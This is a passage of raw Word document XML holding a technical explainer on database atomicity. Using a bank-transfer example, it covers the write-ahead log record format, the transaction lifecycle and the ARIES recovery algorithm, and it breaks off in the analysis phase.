      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>operations that must logically succeed or fail together are physically executed as separate, non-instantaneous steps.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t> A bank transfer — debiting one account and crediting another — involves two distinct write operations separated in time. A hardware failure between them leaves the database in an inconsistent state unless the database engine provides atomicity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D40C67A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090ADE56" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Without atomicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01003C92" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Time T1: BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012070C7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Time T2: UPDATE accounts SET balance = balance - 100 WHERE id = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54933D90" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           (balance goes from 1000 → 900, write to disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAD964A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Time T3: CRASH (power failure, kernel panic, OOM kill)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316B5F5D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Time T4: RESTART</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F363B63" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Time T5: UPDATE accounts SET balance = balance + 100 WHERE id = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91458A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           (this never executes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0625B3A6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F69AC16" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  State after recovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FBBE74" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Account 1: 900 (debited)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC648BA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    Account 2: unchanged (credit never applied)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E0C037" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    $100 vanished from the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793AE41B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DCFD3" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  The partial execution left the database in a state that was never</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2AC0C6" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  intended to exist — no transaction should leave money destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72322DB7" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A10B1C1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>With atomicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7FFEB9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Either both updates apply (transfer succeeds) or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725BCF3A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  neither applies (transfer fails cleanly, no money lost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4729E3F9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  The partial execution cannot be observed by anyone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1BA3B2" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Write-Ahead Log — How Atomicity Is Implemented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1863AE25" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The WAL is the physical implementation of atomicity.</w:t>
      </w:r>
      <w:r w:rsidRPr="001F0BD6">
        <w:t> Every operation that modifies data is first recorded in the log before the data pages are modified. This ordering — write to log, then write to data — enables the database to determine, after a crash, which transactions were complete and which were partial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431C8A0C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E8C893" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>WAL record structure (simplified):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55637D8D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="64D4755E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>+──────────────────────────────────────────────────────────────+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A78D9C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>│ LSN     │ Prev LSN │ TXN ID │ Type   │ Table │ Page │ Data  │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F07A2E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>│ (8 bytes)│ (8 bytes)│(4 bytes)│(1 byte)│(4 B) │(4 B) │(var) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C0EC0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>+──────────────────────────────────────────────────────────────+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1EC5FF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="169EB75C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>LSN:      Log Sequence Number — monotonically increasing byte offset in WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61ECF14D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Prev LSN: pointer to previous WAL record for this transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F20F9B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">          (links all records of one transaction into a chain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364D9815" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>TXN ID:   which transaction this record belongs to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D0313F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Type:     BEGIN, COMMIT, ABORT, INSERT, UPDATE, DELETE, CHECKPOINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FE3300" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Data:     before-image (old values) for undo, after-image (new values) for redo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF75D2C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="08BE101E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Full transaction lifecycle in WAL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7D0C09" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="1E43BDDE" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>BEGIN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D7A639" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Write WAL record: {lsn=1000, type=BEGIN, txn_id=42}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17109181" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AACF90" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>UPDATE accounts SET balance = balance - 100 WHERE id = 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E9AF03" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Write WAL record: {lsn=1001, type=UPDATE, txn_id=42,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEBEEEA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                     table=accounts, page=7, slot=3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79396544" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                     before: {balance=1000},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EECEE0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                     after:  {balance=900}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498333E0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Modify in-memory buffer page (NOT yet on disk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A03AC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031BBB86" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>UPDATE accounts SET balance = balance + 100 WHERE id = 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F5B595" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Write WAL record: {lsn=1002, type=UPDATE, txn_id=42,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4243EDEC" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                     table=accounts, page=12, slot=1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430B4A94" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                     before: {balance=500},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2338F36C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">                     after:  {balance=600}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF400A" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Modify in-memory buffer page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A89640" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98EE30" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>COMMIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F69895" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Write WAL record: {lsn=1003, type=COMMIT, txn_id=42}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73484A64" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  FLUSH WAL to disk (fsync) ← this is the durability moment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375ADC5C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Return success to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C47CFB" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FB6E92" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Dirty buffer pages: eventually written to disk by background writer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCD9229" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  (this can happen AFTER commit returns — WAL makes it safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6CEE6E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The ARIES recovery algorithm — the canonical recovery mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A03F35C" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049C04F0" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>ARIES (Algorithms for Recovery and Isolation Exploiting Semantics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7076300B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>by Mohan, Haderle, Lindsay, Pirahesh, Schwarz (1992)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011E136E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="79DC1922" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Three invariants ARIES maintains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBD13B5" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>1. Write-ahead logging: WAL record for a page must be on disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA9CA69" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   BEFORE the modified page is written to disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC71F2B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   Ensures: undo information available if crash before commit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7503ACBA" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2906624B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>2. Repeating history during redo: after crash, replay ALL WAL records</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F5A17F" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   (even for uncommitted transactions) to restore exact pre-crash state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E418591" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ADCC0B" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:lastRenderedPageBreak/>
        <w:t>3. Logging changes during undo: undo operations are themselves logged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60797698" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">   (Compensation Log Records — CLRs) so undo is idempotent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC792B1" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="3953693E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Recovery phases after crash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF93A4D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6"/>
    <w:p w14:paraId="273E8074" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t>Phase 1 — Analysis (scan WAL from last checkpoint forward):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2ABDF" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Purpose: determine state at crash time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641859A9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15348575" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Build transaction table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF0A3E9" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN 42: status=COMMITTED (saw COMMIT record)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCCE349" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN 43: status=ACTIVE (no COMMIT/ABORT — was in progress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B381F7D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    TXN 44: status=ACTIVE (no COMMIT/ABORT — was in progress)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CF28D" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7891D3AD" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
        <w:t xml:space="preserve">  Build dirty page table:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D72867E" w14:textId="77777777" w:rsidR="001F0BD6" w:rsidRPr="001F0BD6" w:rsidRDefault="001F0BD6" w:rsidP="001F0BD6">
      <w:r w:rsidRPr="001F0BD6">
